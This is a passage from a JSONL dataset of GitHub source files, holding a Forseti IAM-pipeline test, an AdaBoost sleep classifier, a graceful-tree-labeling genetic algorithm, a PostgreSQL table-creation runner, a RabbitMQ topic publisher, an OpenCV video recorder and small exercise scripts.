self.pipeline.dao.get_project_numbers.assert_called_once_with(\n self.pipeline.RESOURCE_NAME, self.pipeline.cycle_timestamp)\n\n self.assertEquals(\n 2, self.pipeline.api_client.get_project_iam_policies.call_count)\n called_args, called_kwargs = (\n self.pipeline.api_client.get_project_iam_policies.call_args_list[0])\n expected_args = (self.pipeline.RESOURCE_NAME,\n self.FAKE_PROJECT_NUMBERS[0])\n self.assertEquals(expected_args, called_args)\n\n called_args, called_kwargs = (\n self.pipeline.api_client.get_project_iam_policies.call_args_list[1])\n expected_args = (self.pipeline.RESOURCE_NAME,\n self.FAKE_PROJECT_NUMBERS[1])\n self.assertEquals(expected_args, called_args)\n\n def test_dao_error_is_handled_when_retrieving(self):\n \"\"\"Test that exceptions are handled when retrieving.\"\"\"\n\n self.pipeline.dao.get_project_numbers.side_effect = (\n data_access_errors.MySQLError('error error', mock.MagicMock()))\n\n with self.assertRaises(inventory_errors.LoadDataPipelineError):\n self.pipeline._retrieve()\n\n @mock.patch.object(\n load_projects_iam_policies_pipeline.base_pipeline, 'LOGGER')\n def test_api_error_is_handled_when_retrieving(self, mock_logger):\n \"\"\"Test that exceptions are handled when retrieving.\n\n We don't want to fail the pipeline when any one project's policies\n can not be retrieved. We just want to log the error, and continue\n with the other projects.\n \"\"\"\n self.pipeline.dao.get_project_numbers.return_value = (\n self.FAKE_PROJECT_NUMBERS)\n self.pipeline.api_client.get_project_iam_policies.side_effect = (\n api_errors.ApiExecutionError('error error', mock.MagicMock()))\n\n results = self.pipeline._retrieve()\n self.assertEqual([], results)\n self.assertEqual(2, mock_logger.error.call_count)\n\n @mock.patch.object(\n load_projects_iam_policies_pipeline.LoadProjectsIamPoliciesPipeline,\n '_get_loaded_count')\n @mock.patch.object(\n load_projects_iam_policies_pipeline.LoadProjectsIamPoliciesPipeline,\n '_load')\n @mock.patch.object(\n load_projects_iam_policies_pipeline.LoadProjectsIamPoliciesPipeline,\n '_transform')\n @mock.patch.object(\n load_projects_iam_policies_pipeline.LoadProjectsIamPoliciesPipeline,\n '_retrieve')\n def test_subroutines_are_called_by_run(self, mock_retrieve, mock_transform,\n mock_load, mock_get_loaded_count):\n \"\"\"Test that the subroutines are called by run.\"\"\"\n\n mock_retrieve.return_value = (\n fake_iam_policies.FAKE_PROJECT_IAM_POLICY_MAP)\n mock_transform.return_value = (\n fake_iam_policies.EXPECTED_LOADABLE_PROJECT_IAM_POLICY)\n self.pipeline.run()\n\n mock_retrieve.assert_called_once_with()\n\n mock_transform.assert_called_once_with(\n fake_iam_policies.FAKE_PROJECT_IAM_POLICY_MAP)\n\n self.assertEquals(2, mock_load.call_count)\n\n # The regular data is loaded.\n called_args, called_kwargs = mock_load.call_args_list[0]\n expected_args = (\n self.pipeline.RESOURCE_NAME,\n fake_iam_policies.EXPECTED_LOADABLE_PROJECT_IAM_POLICY)\n self.assertEquals(expected_args, called_args)\n\n # The raw json data is loaded.\n called_args, called_kwargs = mock_load.call_args_list[1]\n expected_args = (\n self.pipeline.RAW_RESOURCE_NAME,\n fake_iam_policies.FAKE_PROJECT_IAM_POLICY_MAP)\n self.assertEquals(expected_args, called_args)\n\n mock_get_loaded_count.assert_called_once\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"joshiumang107/forseti-security","sub_path":"tests/inventory/pipelines/load_projects_iam_policies_pipeline_test.py","file_name":"load_projects_iam_policies_pipeline_test.py","file_ext":"py","file_size_in_byte":5878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2542519306","text":"from sklearn.base import clone\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom tpcp import OptimizableParameter, OptimizablePipeline, cf\n\nfrom sleep_analysis.datasets.mesadataset import MesaDataset\n\n\nclass AdaBoostPipeline(OptimizablePipeline):\n classifier: OptimizableParameter\n\n def __init__(\n self,\n modality,\n n_estimators=50,\n learning_rate=1,\n algorithm=\"SAMME.R\",\n classifier=cf(AdaBoostClassifier(random_state=1)),\n classification_type=\"binary\",\n ):\n self.modality = modality\n self.n_estimators = n_estimators\n self.learning_rate = learning_rate\n self.algorithm = algorithm\n self.classifier = classifier\n self.epoch_length = 30\n self.classification_type = classification_type\n\n def self_optimize(self, dataset: MesaDataset, **kwargs):\n \"\"\"\n Optimization of whole trainset\n :param dataset: Dataset instance representing the whole train set with its sleep data\n \"\"\"\n # Concat whole dataset to one DataFrame\n features, ground_truth = dataset.get_concat_dataset(dataset, modality=self.modality)\n\n # set classifier parameters from GridSearchCV\n c = self._set_classifier_params(clone(self.classifier))\n\n # train classifier\n if self.classification_type == \"binary\":\n self.classifier = c.fit(features, ground_truth[\"sleep\"])\n else:\n self.classifier = c.fit(features, ground_truth[self.classification_type])\n\n return self\n\n def _set_classifier_params(self, classifier):\n params = {\n \"n_estimators\": self.n_estimators,\n \"learning_rate\": self.learning_rate,\n \"algorithm\": self.algorithm,\n }\n return classifier.set_params(**params)\n\n def run(self, datapoint: MesaDataset):\n \"\"\"\n Subject-wise classification based on trained model\n :param datapoint: Dataset instance representing the sleep data of one participant\n \"\"\"\n features = datapoint.get_features(datapoint, modality=self.modality)\n\n self.classification_ = self.classifier.predict(features)\n\n return self\n","repo_name":"mad-lab-fau/sleep_analysis","sub_path":"sleep_analysis/classification/ml_algorithms/adaboost.py","file_name":"adaboost.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"27993198267","text":"import random as random\r\nimport time\r\nimport matplotlib.pyplot as plt\r\nimport networkx as nx\r\nfrom networkx.drawing.nx_pydot import graphviz_layout\r\n#import os\r\nimport csv\r\n\r\ndef tree_to_matrix(tree,nodes):\r\n temp = []\r\n for line in nx.generate_adjlist(tree):\r\n #line is a string separated by spaces, turn it into a list\r\n my_list = line.split(\" \")\r\n #first element is just a label, so remove it\r\n my_list.pop(0)\r\n #turn the list from strings to integers\r\n my_list = [int(i) for i in my_list]\r\n \r\n temp.append(my_list)\r\n #fill the matrix with zeroes\r\n matrix = [[0]*(nodes) for i in range(nodes)]\r\n \r\n #the ones indicate a connection\r\n #find where the ones should go\r\n for i in range(nodes):\r\n for j in range(nodes):\r\n if j in temp[i]:\r\n matrix[i][j] = 1\r\n matrix[j][i] = 1\r\n \r\n return matrix\r\n\r\ndef graph_tree(tree,id,nodes=None,seed=None,time=None,conflicts=0):\r\n plt.figure(id, figsize = (10,10))\r\n #options for making the graph look nicer\r\n pos = graphviz_layout(tree, prog=\"neato\")\r\n #pos = graphviz_layout(tree, prog=\"dot\")\r\n #pos = graphviz_layout(tree, prog=\"twopi\")\r\n \r\n nx.draw(tree,pos,node_size=900)\r\n \r\n #set z = 2 if using even/odds, else set z=1\r\n z = 1\r\n \r\n #set node labels to be strictly positive, and perhaps all odd if setting z=2\r\n node_labels = {}\r\n for u in tree.nodes():\r\n key = u\r\n value = z*(u+1) - 1\r\n node_labels[key] = value\r\n \r\n #set edge labels to be the difference between the nodes it connects\r\n edge_labels = {}\r\n for u,v in tree.edges():\r\n key = (u,v)\r\n value = z*abs(u-v)\r\n edge_labels[key] = value\r\n \r\n font_size = 20\r\n nx.draw_networkx_labels(tree, pos, labels = node_labels, font_size = font_size)\r\n \r\n #the 'normal' way - looks bad\r\n #nx.draw_networkx_edge_labels(tree, pos, edge_labels = edge_labels, font_size = font_size)\r\n #this alternative keeps the edge labels from rotating\r\n text = nx.draw_networkx_edge_labels(tree, pos, edge_labels = edge_labels, font_size = font_size)\r\n for _,t in text.items():\r\n t.set_rotation('horizontal')\r\n \r\n if id == 1:\r\n title = str(\"Problem graph \\n Nodes = {} \\n Seed = {}\".format(nodes,seed))\r\n # file_name = str(\"Problem_graph_{}_{}.png\".format(nodes,seed))\r\n if id == 2:\r\n title = str(\"Local solution with value {} \\n Nodes = {} \\n Seed = {} \\n Time to solve: {} seconds\".format(conflicts,nodes,seed,time))\r\n # file_name = str(\"Solution_graph_{}_{}.png\".format(nodes,seed))\r\n if id == 3:\r\n title = str(\"Global solution \\n Nodes = {} \\n Seed = {} \\n Time to solve: {} seconds\".format(nodes,seed,time))\r\n # file_name = str(\"Solution_graph_{}_{}.png\".format(nodes,seed))\r\n plt.title(title,fontsize = font_size)\r\n #my_path = os.path.dirname(__file__)\r\n plt.gcf().set_facecolor(\"#A9A9A9\")\r\n #plt.savefig(my_path + '\\\\graphs2\\\\' + file_name, bbox_inches='tight')\r\n plt.show()\r\n\r\n### Matrix manipulation\r\n\r\ndef reorder(order_matrix, tree):\r\n OM = mmult(T(order_matrix), tree)\r\n OMO = mmult(OM, order_matrix)\r\n return OMO\r\n \r\ndef mmult(a,b):\r\n product = []\r\n for i in range(N):\r\n product.append([])\r\n for j in range(N):\r\n prodsum = 0\r\n for k in range(N):\r\n prodsum += a[i][k] * b[k][j]\r\n product[i].append(prodsum)\r\n return product\r\n\r\ndef T(a):\r\n #transpose\r\n T = [[a[j][i] for j in range(N)] for i in range(N)]\r\n #credit for this solution goes to https://www.geeksforgeeks.org/transpose-matrix-single-line-python/\r\n return T\r\n\r\ndef print_matrix(matrix):\r\n max_len = 1\r\n for i in range(len(matrix)):\r\n for j in range(len(matrix[i])):\r\n this_num = matrix[i][j]\r\n if len(str(this_num)) > max_len:\r\n max_len = len(str(this_num))\r\n \r\n for i in range(len(matrix)):\r\n rowtext = \"\"\r\n for j in range(len(matrix[i])):\r\n this_num = matrix[i][j]\r\n space = max_len - len(str(this_num))\r\n rowtext = rowtext + space*' ' + str(this_num) + \" \"\r\n print(rowtext)\r\n \r\n#######################\r\n\r\ndef assignWeights(problem_matrix):\r\n #the weight of each tree will be based on the number of close neighbors\r\n #so, pick a node and find the distance to each other node\r\n #add up these distances - if it's a smaller number, that node is more central\r\n \r\n #note that the problem_matrix already notes all the distance 1's\r\n #so use it as a starting point\r\n distances = [row[:] for row in problem_matrix]\r\n for d in range(2,N):\r\n for i in range(N):\r\n distances[i][i] = -1\r\n for j in range(N):\r\n if distances[i][j] == d-1:\r\n for k in range(N):\r\n if problem_matrix[j][k] == 1 and distances[i][k] == 0:\r\n distances[i][k] = d\r\n \r\n weights = []\r\n for i in range(N):\r\n rowsum = 0\r\n for j in range(N):\r\n if distances[i][j] == -1:\r\n distances[i][j] = 0\r\n rowsum += distances[i][j]\r\n weights.append(rowsum)\r\n \r\n return weights,distances\r\n \r\ndef judge(this_list, tree, weights, distances):\r\n this_matrix = listToMatrix(this_list)\r\n newTree = reorder(this_matrix, tree)\r\n evaluation = conflicts(newTree)\r\n troublemakers = findTrouble(newTree)\r\n return evaluation, troublemakers\r\n \r\ndef listToMatrix(this_list):\r\n this_matrix = []\r\n for i in range(N):\r\n this_row = []\r\n for j in range(N):\r\n if this_list[i] == j:\r\n this_row.append(1)\r\n else:\r\n this_row.append(0)\r\n this_matrix.append(this_row)\r\n return this_matrix\r\n\r\ndef conflicts(tree):\r\n count = -N + 1\r\n for i in range(1,N): #start with the diagonal where C-R = 1\r\n d = 0\r\n for j in range(i,N):\r\n d += tree[j-i][j]\r\n count += d**2\r\n \r\n not_used = [1]*(N-1)\r\n for i in range(1,N): #start with the diagonal where C-R = 1\r\n for j in range(i,N):\r\n if tree[j-i][j] == 1:\r\n not_used[i-1] = 0\r\n\r\n unused_weighted = 0\r\n for i in range(1,N):\r\n unused_weighted += i * not_used[i-1]\r\n \r\n return int(count / 2), sum(not_used), unused_weighted\r\n \r\ndef findTrouble(tree):\r\n #identify where the 1s are\r\n diagonals = []\r\n rows = []\r\n cols = []\r\n for i in range(1,N):\r\n for j in range(i,N):\r\n if tree[j-i][j] == 1:\r\n diagonals.append(i)\r\n rows.append(j-i)\r\n cols.append(j)\r\n \r\n troublemakers = []\r\n for i in range(N-1):\r\n for j in range(i+1,N-1):\r\n if diagonals[i] == diagonals[j]:\r\n troublemakers.append(rows[i]) #the troublemaker lived in this row\r\n troublemakers.append(rows[j]) #the other one lived in this row\r\n #troublemakers.append(cols[i]) #need to track the cols as well because\r\n #troublemakers.append(cols[j]) # only the upper triangle was checked\r\n \r\n return troublemakers\r\n\r\ndef chooseConnection(weights, distances):\r\n # first version will always choose the best-looking candidate\r\n # but this one may not always produce a solution\r\n # so future versions should have a chance to choose the second or third best\r\n \r\n # appraisals = [x[:] for x in distances] # make a deep copy\r\n # min_value = -1\r\n # node_a = -1\r\n # node_b = -1\r\n \r\n # for a in range(N):\r\n # for b in range(N):\r\n # if appraisals[a][b] == 1:\r\n # appraisals[a][b] = weights[a] + weights[b] #plus or multiply?\r\n # if min_value == -1 or appraisals[a][b] < min_value:\r\n # min_value = appraisals[a][b]\r\n # node_a,node_b = a,b\r\n # else:\r\n # appraisals[a][b] = 0\r\n \r\n # and this is the future version\r\n # a problem: using distance is very good at finding the 'best-looking' splitting edge\r\n # but it will often choose useless leafs as the second-best-looking\r\n \r\n appraisals = []\r\n appraisal_indexes = []\r\n for a in range(N-1):\r\n for b in range(a+1,N):\r\n if distances[a][b] == 1:\r\n appraisals.append(((weights[a] + weights[b])/2)**-2)\r\n appraisal_indexes.append([a,b])\r\n \r\n appraisal_sum = sum(appraisals)\r\n r = random.random()\r\n i = 0\r\n for i in range(len(appraisals)):\r\n a = appraisals[i] / appraisal_sum\r\n if r < a:\r\n node_a,node_b = appraisal_indexes[i]\r\n break\r\n else:\r\n r -= a\r\n # print(\"Chose\",node_a,node_b)\r\n return node_a,node_b\r\n\r\ndef assignTrees(distances, node_a, node_b):\r\n # each node will be on either side of the chosen connection\r\n rowA = distances[node_a]\r\n rowB = distances[node_b]\r\n \r\n nA = 0 # these count the nodes in each sub-tree\r\n nB = 0\r\n \r\n assignments = []\r\n \r\n for i in range(N):\r\n if rowA[i] < rowB[i]:\r\n assignments.append(0)\r\n nA += 1\r\n if rowB[i] < rowA[i]:\r\n assignments.append(1)\r\n nB += 1\r\n \r\n return assignments, nA, nB\r\n\r\ndef cycleList(this_list,n):\r\n return this_list[n:] + this_list[:n]\r\n\r\n###\r\n\r\ndef populate(population_size, number_positions, tree, weights, distances):\r\n population = []\r\n for i in range(population_size):\r\n nA,nB = 0,0\r\n while nB < 2:\r\n nodeA, nodeB = chooseConnection(weights, distances)\r\n assignments, nA, nB = assignTrees(distances, nodeA, nodeB)\r\n \r\n # make two list of independent random assignments within each half of the tree\r\n offset = random.randrange(1,nB)\r\n subtreeA = random.sample(range(offset, offset + nA), nA)\r\n subtreeB0 = random.sample(range(offset + nA, offset + N), nB)\r\n subtreeB = [subtreeB0[i]%N for i in range(nB)] # wrap around the values which exceed N\r\n \r\n # put them together based on the original tree\r\n this_list = []\r\n j,k = 0,0\r\n for i in range(N):\r\n if assignments[i] == 0:\r\n this_list.append(subtreeA[j])\r\n j += 1\r\n if assignments[i] == 1:\r\n this_list.append(subtreeB[k])\r\n k += 1\r\n \r\n this_value,these_troublemakers = judge(this_list, tree, weights, distances)\r\n population.append((this_list, this_value, these_troublemakers, nodeA,nodeB, assignments, nA,nB, offset))\r\n return population\r\n\r\ndef repopulate(population_size, number_children, tree, weights, distances, population):\r\n new_population = []\r\n \r\n for i in range(number_children):\r\n choice = random.randint(0, population_size-1)\r\n kid = population[choice][0].copy()\r\n nodeA,nodeB, assignments, nA,nB, offset = population[choice][3:]\r\n print(\"nodeA\",nodeA,\"nodeB\",nodeB,\"offset\",offset)\r\n \r\n troublemakers = list(dict.fromkeys(population[choice][2]))\r\n # note which subtrees have troublemakers\r\n bad_trees = []\r\n i = 0\r\n while i < len(troublemakers):\r\n trouble = kid.index(troublemakers[i])\r\n bad_trees.append(assignments[trouble])\r\n i += 1\r\n \r\n # shuffle the troublemakers\r\n j = 0\r\n while j < len(troublemakers):\r\n trouble = kid.index(troublemakers[j])\r\n rando = random.randrange(N)\r\n \r\n if assignments[trouble] == assignments[rando]:\r\n kid[rando],kid[trouble] = kid[trouble],kid[rando]\r\n j += 1\r\n \r\n # then, shuffle some more\r\n shuffles = random.randrange(-1, int(N / (len(troublemakers) + 1)))\r\n # shuffles = random.randrange(1,N)\r\n while shuffles > 0:\r\n flippers = random.sample(range(N), 2)\r\n rando1 = flippers[0]\r\n rando2 = flippers[1]\r\n \r\n if assignments[rando1] == assignments[rando2] and assignments[rando1] in bad_trees:\r\n kid[rando2],kid[rando1] = kid[rando1],kid[rando2]\r\n shuffles -= 1\r\n \r\n kid_value,kid_troublemakers = judge(kid, tree, weights, distances)\r\n new_population.append((kid, kid_value, kid_troublemakers, nodeA,nodeB, assignments, nA,nB, offset))\r\n return new_population\r\n\r\ndef getBestPop(population, new_population, J):\r\n all_population = population + new_population\r\n best_population = sorted(all_population, key = lambda x: x[1][J])\r\n return best_population[:len(population)]\r\n\r\ndef matrix_to_AL(matrix, nodes):\r\n adjacency_list = []\r\n for i in range(nodes):\r\n temp = str(i)\r\n for j in range(nodes):\r\n foo = matrix[i][j]\r\n if(j>i and foo == 1):\r\n temp += \" \" + str(j)\r\n adjacency_list.append(temp)\r\n return adjacency_list\r\n\r\ndef f(number):\r\n #format to 3 sig figs\r\n return int(number*1000)/1000\r\n\r\ndef trendAverage(trends):\r\n trend = []\r\n rows = len(trends[0])\r\n cols = len(trends)\r\n T = [[trends[j][i] for j in range(cols)] for i in range(rows)]\r\n for r in T:\r\n trend.append(sum(r)/len(r))\r\n return trend\r\n\r\ndef custom_tree():\r\n return nx.read_adjlist(\"tree.txt\", nodetype=int)\r\n\r\ndef findSolution(N,S,J):\r\n nodes = N\r\n maxIter = 1000\r\n population_size = 100\r\n number_children = int(population_size / 2)\r\n \r\n seed = S\r\n tree = nx.random_tree(nodes,seed=seed)\r\n graph_tree(tree,1,nodes,seed)\r\n problem_matrix = tree_to_matrix(tree,nodes)\r\n print()\r\n print(\"Now on seed\",S)\r\n #print_matrix(problem_matrix)\r\n weights,distances = assignWeights(problem_matrix)\r\n print()\r\n #print_matrix(distances)\r\n #print(weights)\r\n \r\n best1 = [(N**2) * 2 * sum(weights)] * 3 # initialize to a high value\r\n trend = []\r\n \r\n population = populate(population_size, nodes, problem_matrix, weights, distances)\r\n \r\n start = time.time()\r\n for i in range(maxIter):\r\n new_population = repopulate(population_size, number_children, problem_matrix, weights, distances, population)\r\n population = getBestPop(population, new_population, J)\r\n if population[0][1][J] < best1[J]:\r\n best0 = population[0][0]\r\n best1 = population[0][1]\r\n best2 = population[0][2]\r\n print(\"new best\",best1,\"on tick\",i,\"and it's\",best0,\"and the troublemakers are\",best2)\r\n # trend.append(best1[J])\r\n if len(population[0][2]) == 0:\r\n break\r\n if i%50 == 0:\r\n print(\"now on tick\",i)\r\n end = time.time()\r\n \r\n solve_time = f(end - start)\r\n # if len(trend) < maxIter:\r\n # trend += [best1] * (maxIter - len(trend))\r\n \r\n sorted_population = sorted(population, key = lambda x: x[1])\r\n best_solution = sorted_population[0]\r\n best_value = best_solution[1][J]\r\n print(\"Best solution value:\",best_solution[1][J])\r\n if best_value > 0:\r\n print(\"Local Optimal Solution Found!\")\r\n id = 2\r\n else:\r\n print(\"Global Optimal Solution Found!\")\r\n id = 3\r\n solution_matrix = reorder(listToMatrix(best_solution[0]),problem_matrix)\r\n print_matrix(solution_matrix)\r\n AL = matrix_to_AL(solution_matrix, nodes)\r\n solution_tree = nx.parse_adjlist(AL, nodetype=int)\r\n graph_tree(solution_tree,id,nodes,seed,solve_time,int(best_value))\r\n \r\n return solve_time,id,trend, best_solution[1]\r\n\r\nif __name__ == '__main__':\r\n nMin = 30\r\n nMax = 30\r\n nInc = 5\r\n \r\n sMin = 0\r\n sMax = 1\r\n seeds = sMax-sMin\r\n seedList = [0,2,5,7,10,11,13,14,15,16,21,23,26,27,29,30,31,33,36,41,42,43,48,51,57,63,66,69,74,75,77,78,80,83,85,89,91,92,96,98]\r\n \r\n J = judgement_choice = 2 # 0=conflicts , 1=unused , 2=unused_weighted\r\n \r\n times = []\r\n solves = []\r\n Ntrends = []\r\n \r\n conflict_sum = 0\r\n unused = 0\r\n unused_weighted = 0\r\n \r\n # with open('results_splitting.csv', mode='w', newline='') as results_file:\r\n # results_writer = csv.writer(results_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\r\n # results_writer.writerow([\"Perfect\",\"Time\",\"Nodes\",\"Seed\",\"Evaluator\",\"Conflicts\",\"Unused\",\"Unused_Weighted\"])\r\n \r\n N = nMin\r\n while N <= nMax:\r\n totalTime = 0\r\n perfectSolves = 0\r\n # trends = []\r\n for S in seedList[sMin:sMax]:\r\n solveTime,id,trend, judgements = findSolution(N,S,J)\r\n \r\n totalTime += solveTime\r\n perfectSolves += (id-2)\r\n # trends.append(trend)\r\n \r\n conflict_sum += judgements[0]\r\n unused += judgements[1]\r\n unused_weighted += judgements[2]\r\n \r\n with open('results_splitting.csv', mode='a+', newline='') as results_file:\r\n results_writer = csv.writer(results_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\r\n results_writer.writerow([id-2,solveTime,N,seedList.index(S),J,judgements[0],judgements[1],judgements[2]])\r\n \r\n average = f(totalTime/seeds)\r\n times.append(average)\r\n solves.append(perfectSolves)\r\n # Ntrend = trendAverage(trends)\r\n # Ntrends.append(Ntrend)\r\n N += nInc\r\n \r\n print()\r\n \r\n N = nMin\r\n i=0\r\n while N <= nMax:\r\n print(\"Splitting\")\r\n print(\"Judgement choice:\",J)\r\n print(\"Average time for\",N,\"nodes:\",times[i],\"seconds\")\r\n print(\"\\t Perfect solutions:\",solves[i],\"out of\",seeds)\r\n print(\"\\t Average conflicts remaining:\",f(conflict_sum/seeds))\r\n print(\"\\t Average unused edge labels:\",f(unused/seeds))\r\n print(\"\\t Average unused (weighted):\",f(unused_weighted/seeds))\r\n N += nInc\r\n i += 1","repo_name":"Mike-Arnold/Graceful","sub_path":"graceful_splitting.py","file_name":"graceful_splitting.py","file_ext":"py","file_size_in_byte":18079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33962744115","text":"#Import statements\nimport sys\nimport os\nimport argparse\nimport configparser\nimport psycopg2\nimport logging\nimport csv\n\n'''\n\n'''\n\n#Main Function\ndef main ():\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(levelname)s - %(message)s',\n handlers=[logging.FileHandler('/tmp/{}.log'.format(os.path.splitext(sys.argv[0])[0])),\n logging.StreamHandler()])\n os.chdir(sys.path[0])\n auth = get_config_params('config.ini')\n args = parse_args()\n \n with open(\"/usr/src/app/cHazard/{prov}/cH_{prov}_hmaps.csv\".format(**{'prov':args.province}), \"r\") as f:\n reader = csv.reader(f)\n hmapColumns = next(reader)\n hmapColumns = ','.join('\"{0}\"'.format(w) for w in hmapColumns)\n hmapColumns = hmapColumns.replace('-','_')\n hmapColumns = hmapColumns.replace('\"lon\"','lon')\n hmapColumns = hmapColumns.replace('\"lat\"','lat')\n # hmapColumns = hmapColumns.replace('\"PGA_0.02\"','PGA_0.02')\n # hmapColumns = hmapColumns.replace('\"PGA_0.1\"','PGA_0.02')\n\n with open(\"/usr/src/app/cHazard/{prov}/cH_{prov}_uhs.csv\".format(**{'prov':args.province}), \"r\") as f:\n reader = csv.reader(f)\n uhsColumns = next(reader)\n uhsColumns = ','.join('\"{0}\"'.format(w) for w in uhsColumns)\n uhsColumns = uhsColumns.replace('~','_')\n uhsColumns = uhsColumns.replace('\"lon\"','lon')\n uhsColumns = uhsColumns.replace('\"lat\"','lat')\n # uhsColumns = uhsColumns.replace('\"0.2_PGA\"','0.2_PGA')\n\n sqlquerystring = open(args.sqlScript, 'r').read().format(**{\n 'prov':args.province, \n 'hmapColumns':hmapColumns,\n 'uhsColumns':uhsColumns})\n \n\n try:\n connection = psycopg2.connect(user = auth.get('rds', 'postgres_un'),\n password = auth.get('rds', 'postgres_pw'),\n host = auth.get('rds', 'postgres_host'),\n port = auth.get('rds', 'postgres_port'),\n database = auth.get('rds', 'postgres_db'))\n cursor = connection.cursor()\n cursor.execute(sqlquerystring)\n #cursor.commit()\n connection.commit()\n\n except (Exception, psycopg2.Error) as error :\n logging.error(error)\n\n finally:\n if(connection):\n cursor.close()\n connection.close()\n\n return\n\n\n#Support Functions\ndef get_config_params(args):\n \"\"\"\n Parse Input/Output columns from supplied *.ini file\n \"\"\"\n configParseObj = configparser.ConfigParser()\n configParseObj.read(args)\n return configParseObj\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='''''')\n parser.add_argument(\"--province\", type=str, help=\"Two letter province/territory identifier\")\n parser.add_argument(\"--sqlScript\", type=str, help=\"PSRA SQL Script to Run\")\n args = parser.parse_args()\n\n return args\n\nif __name__ == '__main__':\n main() ","repo_name":"OpenDRR/model-factory","sub_path":"scripts/PSRA_runCreate_tables.py","file_name":"PSRA_runCreate_tables.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"7455406103","text":"import pika\nimport sys\n\nusername = \"shiwei\"\npwd = 'shiwei666666'\nuser_pwd = pika.PlainCredentials(username, pwd)\n\n# 创建连接\nconn = pika.BlockingConnection(pika.ConnectionParameters(\"localhost\", credentials=user_pwd))\n\nchannel = conn.channel()\n\nchannel.exchange_declare(exchange='topic_logs',\n exchange_type='topic')\n\nrouting_key = sys.argv[1] if len(sys.argv) > 1 else 'anonymous.info'\nmessage = ' '.join(sys.argv[2:]) or 'Hello World!'\nchannel.basic_publish(exchange='topic_logs',\n routing_key=routing_key,\n body=message)\nprint(\" [x] Sent %r:%r\" % (routing_key, message))\nconn.close()\n\n","repo_name":"SuoSuo-Rocky/RabbitMQ-FullStack","sub_path":"RabbitMQ_Demo/发布_订阅_广播,一对多/topic_exchange/Demo01/topic_send.py","file_name":"topic_send.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73558002064","text":"def correct(nums, solution):\n red = [i for i in range(1,6)]\n blue = [i for i in range(5, 0, -1)]\n yellow = [3, 3, 3, 3, 3]\n\n def color(color, nums, solution):\n key = []\n i = 0 \n while i < nums:\n if i >= len(red):\n key.append(color[i - len(red)])\n else: \n key.append((color[i]))\n i += 1\n\n score = []\n for j in range(len(key)):\n if key[j] == solution[j]:\n score.append(True)\n \n return score.count(True)\n \n red_correct_count = color(red, nums, solution)\n blue_correct_count = color(blue, nums, solution)\n yellow_correct_count = color(yellow, nums, solution)\n \n\n max_val = max(red_correct_count,blue_correct_count,yellow_correct_count)\n print(max_val)\n \n result_dict = {'red':red_correct_count, 'blue':blue_correct_count, 'yellow':yellow_correct_count}\n \n final = []\n \n for k, v in result_dict.items():\n if v == max_val:\n final.append(k)\n \n if len(final) == 3:\n return final[0], final[1], final[2]\n elif len(final) == 2:\n return final[0], final[1]\n else:\n return final[0]\n \n\ndef main():\n nums = int(input())\n solution = list(map(int, input().split()))\n print(correct(nums, solution))\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"haenara-shin/CodingTestChallenges","sub_path":"Elice/[Elice] RandomSolving_Elice.py","file_name":"[Elice] RandomSolving_Elice.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25361711144","text":"import cv2\nimport threading\n\n\nclass RecordingThread(threading.Thread):\n def __init__(self, name, camera):\n threading.Thread.__init__(self)\n self.name = name\n self.isRunning = True\n\n self.cap = camera\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n self.out = cv2.VideoWriter('./static/video.avi', fourcc, 20.0, (640, 480))\n\n def run(self):\n while self.isRunning:\n ret, frame = self.cap.read()\n if ret:\n self.out.write(frame)\n\n self.out.release()\n\n def stop(self):\n self.isRunning = False\n\n def __del__(self):\n self.out.release()\n\n\nclass VideoCamera(object):\n def __init__(self):\n # 打开摄像头, 0代表笔记本内置摄像头\n self.cap = cv2.VideoCapture(0)\n\n # 初始化视频录制环境\n self.is_record = False\n self.out = None\n\n # 视频录制线程\n self.recordingThread = None\n\n # 退出程序释放摄像头\n def __del__(self):\n self.cap.release()\n\n def get_frame(self):\n ret, frame = self.cap.read()\n\n if ret:\n ret, jpeg = cv2.imencode('.jpg', frame)\n\n # 视频录制\n if self.is_record:\n if self.out == None:\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n self.out = cv2.VideoWriter('./static/video.avi', fourcc, 20.0, (640, 480))\n\n ret, frame = self.cap.read()\n if ret:\n self.out.write(frame)\n else:\n if self.out != None:\n self.out.release()\n self.out = None\n\n return jpeg.tobytes()\n\n else:\n return None\n\n def start_record(self):\n self.is_record = True\n self.recordingThread = RecordingThread(\"Video Recording Thread\", self.cap)\n self.recordingThread.start()\n\n def stop_record(self):\n self.is_record = False\n\n if self.recordingThread != None:\n self.recordingThread.stop()\n","repo_name":"Kr1s77/flask-video-streaming-recorder","sub_path":"controller/utils/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":219,"dataset":"github-code","pt":"48"} +{"seq_id":"19650260251","text":"class Book():\n def __init__(self, title, description, author, genre, checked_out, cover_url, urn):\n self.title = title\n self.description = description\n self.author = author\n self.genre = genre\n self.checked_out = checked_out\n self.cover_url = cover_url\n self.lent_to = []\n self.urn = urn\n","repo_name":"conradr/Week_3_Library_Flask","sub_path":"models/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15921255823","text":"from pwcolor import *\r\nfrom graphics import *\r\nfrom e32 import *\r\nfrom pwfill import *\r\nimport _graphics\r\nimport sysinfo\r\n\r\n__all__ = 